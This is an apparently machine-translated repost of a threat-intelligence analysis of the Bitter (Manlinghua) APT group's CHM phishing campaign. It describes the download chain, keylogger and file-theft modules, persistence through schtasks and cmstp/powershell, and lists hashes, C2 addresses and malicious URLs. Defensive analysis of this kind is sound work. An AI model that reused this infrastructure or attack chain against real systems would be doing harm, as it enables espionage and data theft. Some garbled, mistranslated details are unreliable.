Shulou(Shulou.com)06/03 Report--

This article mainly explains "how to understand the CHM file delivery and follow-up operation of Manlinghua organization". Interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Next let the editor to take you to learn "how to understand the CHM file release and follow-up operation of Manlinghua organization"!

Overview

BITTER is an APT organization suspected to have a South Asian background. It has long carried out attacks against China, Pakistan and other countries, mainly targeting government, military industry, electric power, nuclear energy and other units to steal sensitive information.

Recently, Qianxin threat Intelligence Center found in the daily monitoring process that Manlinghua APT organization began to send RAR packages containing malicious script Chm files through the mailbox, launching targeted attacks against relevant units at home and abroad. After telemetry, this kind of attack has been going on for two years, and we call it operation magichm.

After tracing back to the source, Manlinghua used a completely different attack chain from the previous attack, used .net remote control as a node to execute commands or issued plug-ins, and issued a new module that had never been disclosed before. The whole process of attack is as follows:

Sample analysis

In the first stage, the samples are delivered by mail, and the attachment contains

The built-in malicious script will be executed when Chm is started

Create a scheduled task download msi from a remote server and execute it. Through the Sky Rock log, we found an interesting phenomenon. The victim opened a malicious file at 16:21 to create a scheduled task, successfully downloaded and executed the Msi file from the server at 16:52, and released the payload named dlhost.exe in the c:\ intel\ logs\ directory.

File name

MD5

Types

Dlhost.exe

25a16b0fca9acd71450e02a341064c8d

PE

This sample is the ArtraDownloader commonly used in Manlinghua tissue.

C2VOR 82.221.136.27, RguhsTmax, RguhsTmax, RguhsT, etc.

However, the Sky engine killed the file as soon as it landed, and did not perform any follow-up actions. Then it took the Manlinghua organization half an hour to replace the payload on the server. It was not until 17:21 that the victim successfully downloaded a kill-free Downloader. We named it MuuyDownLoader. The message is as follows:

File name

MD5

Types

Otx_live.exe

6452e2c243db03ecbcacd0419ff8bebf

PE

Create a "Check" semaphore for mutual exclusion

Check if there is 360totalSecurity, Tencent, kaspersky, etc., and copy yourself to

% userprofile%\ appdata\ roaming\ microsoft\ windows\ sendto is named winupd.exe

Collect local information

Enter the download process to decrypt C2. The URL visited is as follows

URL

Meaning

OtPefhePbvw/onlinedata1inf.php?data= {Native data collected}

Send local related information

OtPefhePbvw/datarcvoninfile.php?idata=

Initiate a request to download payload and return the payload name

OtPefhePbvw/nnodata3inf.php?inf1=

Check to see if payload is running

OtPefhePbvw/xFiiL33i5sx/%payloadName%

If payload is not running, download

After a successful download, it will be stored in the% userprofile%\ appdata\ roaming\ microsoft\ windows\ sendto directory. The sample information is as follows:

File name

MD5

Types

Msmpenq.exe

7cf4ea9df2f2e406fac23d71194c78fd

.net

The sample is the. Net remote control program commonly used by Bitter.

C2 is converted to hexadecimal and stored in the configuration file, C2VR 45.11.19.170VR 34318

In the previous research on Bitter organization, we only regard. Net remote control as a plug-in of ArtraDownloader, and its main function is to steal victim data.

But in this attack, we found that the gang used it as a node to distribute plug-ins for the first time. All distributed plug-ins are free from killing, and the information is as follows:

File name

MD5

Types

Function

Sysmgr.exe

Ade9a4ee3acbb0e6b42fb57f118dbd6b

VC

File collection module

Scvhost.exe

578918166854037cdcf1bb3a06a7a4f3

VC

Keyboard recording module

Winsync.exe

Eb6f0cfb0dff0f[b] 504dc1f060f02adaa

CAB-SFX

Backup module

It is worth mentioning that the cmd command is executed using node remote control before distributing the plug-in, for example, the tasklist | find "Sysmgr" command is executed to determine whether the plug-in is running. After the plug-in is issued, the schtasks command is used to persist the plug-in.

Sysmgr.exe is a kill-free version of the file collection module commonly used in Bitter organizations. in previous attacks on Bitter, the plug-ins of this type are generally named Lsapip, Lsap, Lsapcr, Lsapc, etc., all issued by ArtraDownloader.

The data is then sent to the remote server via POST

C2:svc2mcxwave.net/UihbywscTZ/45Ugty845nv7rt.php

Scvhost.exe is a keyboard recording module commonly used by Bitter organizations. in previous attacks on Bitter, the names of this type of plug-ins are generally Igfxsrvk, keylogger, etc., and are also issued by ArtraDownloader.

Winsync.exe is a module that has never been disclosed before, and we call it the standby module BackupDownloader, which is packaged by CAB-SFX and releases and executes the appsync.vbs script during execution.

A malicious inf script is executed through cmstp, and the inf script calls powershell to download payload (wdisvcnotifyhost.com/n9brCs21/apprun) from a remote server, and finally registers it as a scheduled task for persistence.

We observe that when the core .net node is running normally, the Payload on the remote server is always in a state of 404. when the core node is killed or cleared manually, the attacker will upload the kill-free core node on the remote server. after the core node is revived, the attacker first executes the keylogger module and uses the cmd command to evaluate the damage.

Correlation analysis

Based on Qianxin telemetry data, we found that Bitter APT started sending malicious Chm messages by mid-2019 at the latest. The samples captured in history are as follows:

File name

URL

20210225.doc.chm

Http://youxiangxiezhu.com/youxi/crt.php?h=

Suspicious NTC Mail Server Access Logs.chm

Http://sartetextile.com/img/wnsetup.msi

Maritime policy analysis and impact on port security in South Asia. CHM

Http://windiagnosticsvc.net/jscript/jsp.php?h=

SHIPMENT TO PNS INVOICE NO 03021.chm

Http://myprivatehostsvc.com/br/js.php?h=

SOP for Logging out Mail and PCs.chm

Http://myprivatehostsvc.com/xuisy/css.php?h=

Invitation To Roundtable.chm

Http://msisspsvc.net/img/msiwindef.msi

Schedule .chm

Http://w32timeslicesvc.net/jscript/jsp.php?h=

Remote.chm

Http://sartetextile.com/img/wnsetup.msi

MyPictures.jpg.chm

Https://bheragreens.com/img/winsupdater.msi

Annex-Conference .chm

Http://webmailcgwip.com/xingsu/asp.php?h=

...

...

The MuuyDownLoader used in this event can be traced back to 2019.

File name

MD5

ITW

Wupdte

4bcfb31d0e3df826d3615a41149ebf9c

Http://galluppakistan.com/images/wupdte

Wupd.msi

F38b9ac9d6a1070ac9dbae6f30c1f8aa

The old version of the sample contains PDB:

PDB

C:\ Users\ user\ Desktop\ 360ActiveDefence 1.4 Sep2019\ 360ActiveDefence 1.4 V2\ Release\ 360ActiveDefence.pdb

The code structure of the new and old versions is very similar.

At this point, I believe you have a deeper understanding of "how to understand the CHM file delivery and follow-up operation of Manlinghua organization". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.